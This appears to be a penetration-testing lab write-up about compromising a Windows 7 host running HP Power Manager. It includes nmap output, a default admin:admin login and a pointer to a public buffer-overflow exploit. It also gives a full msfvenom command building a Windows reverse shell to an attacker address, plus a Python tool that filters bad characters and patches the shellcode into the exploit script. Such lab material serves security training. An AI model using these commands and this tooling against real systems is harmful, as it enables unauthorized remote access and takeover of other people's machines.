PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 125 GoAhead WebServer
|_http-server-header: GoAhead-Webs
| http-title: HP Power Manager
|_Requested resource was http://192.168.218.45/index.asp
| http-methods:
|_ Supported Methods: GET HEAD
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 125 Windows 7 Ultimate N 7600 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped syn-ack ttl 125
| rdp-ntlm-info:
| Target_Name: KEVIN
| NetBIOS_Domain_Name: KEVIN
| NetBIOS_Computer_Name: KEVIN
| DNS_Domain_Name: kevin
| DNS_Computer_Name: kevin
| Product_Version: 6.1.7600
|_ System_Time: 2024-07-19T14:03:29+00:00
49152/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49158/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49159/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Access 80/tcp web page (GoAhead-Webs): admin:admin login --> succeeds. /help page --> HP Power Manager 4.2 --> https://www.exploit-db.com/exploits/10099 (Buffer Overflow, public exploit script 10099.py)
Replace the text in the SHELL variable after "n00bn00b" with our own shellcode. Generate it with msfvenom, excluding the bad characters the exploit cannot send (-b) and using the x86/alpha_mixed encoder, whose alphanumeric output contains none of them (\x25 is listed twice in -b; that is harmless). The payload is a reverse shell to 192.168.45.180:80, so start a listener on that port before running the exploit:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.180 LPORT=80 -f c -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" -e x86/alpha_mixed
Run: python2.7 10099.py 192.168.218.45 -->
Got reverse shell as NT administrator user!
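Added helper for the patching step above (example code written for this write-up, not part of it and not part of the exploit-db 10099 script): it parses msfvenom -f c output, verifies that none of the bad characters from the -b list are present, and rewrites the SHELL variable after the "n00bn00b" marker. It assumes the exploit lays its payload out as SHELL=("n00bn00b" followed by "\x.." string literals and a closing parenthesis; the embedded sample script and sample msfvenom outputs are constructed stand-ins, and the file names in the usage line are placeholders.

```python
"""Check an msfvenom payload against the bad-character list and patch it
into the SHELL variable of the HP Power Manager exploit script.

Assumed layout of the exploit's payload block (assumption, verify against
the real 10099.py before use):
    SHELL=("n00bn00b"
    "\\x..\\x.."
    )
"""
import ast
import re
import sys

# Bad characters taken from the msfvenom -b argument used in the write-up.
# \x25 appears twice there; a set makes the duplicate irrelevant.
BADCHARS = set(bytes.fromhex("003a263f2523200a0d2f2b0b5c3d3b2d2c2e24251a"))

PREFIX = "n00bn00b"  # marker the exploit keeps in front of the payload
SHELL_RE = re.compile(r'(SHELL\s*=\s*\(\s*"' + PREFIX + r'"\s*)(.*?)(\))', re.S)

# Constructed stand-in for the exploit's payload block (not the real script).
SAMPLE_SCRIPT = (
    "#!/usr/bin/python\n"
    "# constructed stand-in for the exploit's payload block\n"
    "import sys, socket\n"
    'SHELL=("n00bn00b"\n'
    '"\\x41\\x41\\x41\\x41"\n'
    '"\\x42\\x42"\n'
    ")\n"
    "target = sys.argv[1]\n"
)

# Constructed msfvenom -f c output: push eax; pop ecx; dec ecx ... (alphanumeric, clean).
SAMPLE_CLEAN_C = (
    "unsigned char buf[] = \n"
    '"\\x50\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49"\n'
    '"\\x49\\x49\\x49\\x49";\n'
)

# Constructed output containing two bad characters (\x3a and \x00) at offsets 4 and 5.
SAMPLE_DIRTY_C = 'unsigned char buf[] = \n"\\x31\\xc0\\x50\\x68\\x3a\\x00";\n'


def parse_c_shellcode(text):
    """Turn msfvenom -f c output (unsigned char buf[] = "\\x..";) into bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def find_badchars(shellcode, badchars=BADCHARS):
    """Return (offset, byte) for every bad character present; empty list means clean."""
    return [(i, b) for i, b in enumerate(shellcode) if b in badchars]


def to_string_literals(shellcode, width=16):
    """Render bytes as one "\\x.." literal per line, in the exploit's own style."""
    return "\n".join(
        '"' + "".join("\\x%02x" % b for b in shellcode[i:i + width]) + '"'
        for i in range(0, len(shellcode), width)
    )


def patch_shell(script, shellcode):
    """Replace the payload after the n00bn00b marker; refuse bad characters."""
    bad = find_badchars(shellcode)
    if bad:
        raise ValueError("bad characters at offsets %s" % [i for i, _ in bad])
    if not SHELL_RE.search(script):
        raise ValueError('SHELL=("n00bn00b" ... ) block not found in script')
    return SHELL_RE.sub(
        lambda m: m.group(1).rstrip() + "\n" + to_string_literals(shellcode) + "\n" + m.group(3),
        script,
        count=1,
    )


def extract_shell(script):
    """Read the SHELL literal (marker + payload) back as bytes, to confirm a patch."""
    m = SHELL_RE.search(script)
    if not m:
        raise ValueError("SHELL block not found")
    literal = '("' + PREFIX + '"' + m.group(2) + ")"
    return ast.literal_eval(literal).encode("latin-1")


def main(argv):
    """usage: patch_shell.py 10099.py shellcode.c > 10099_patched.py (file names assumed)"""
    if len(argv) != 3:
        sys.stderr.write("usage: %s EXPLOIT.py MSFVENOM_OUTPUT.c\n" % argv[0])
        return 2
    with open(argv[1]) as f:
        script = f.read()
    with open(argv[2]) as f:
        shellcode = parse_c_shellcode(f.read())
    sys.stdout.write(patch_shell(script, shellcode))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Every byte in the -b list is a control or punctuation character, none is alphanumeric, which is why the x86/alpha_mixed body passes the check; the helper still scans the whole blob, including the encoder's small non-alphanumeric GetPC stub at the front, and refuses to patch if anything from the list is present. The helper is Python 3; the patched exploit itself is still run under python2.7 as on the page.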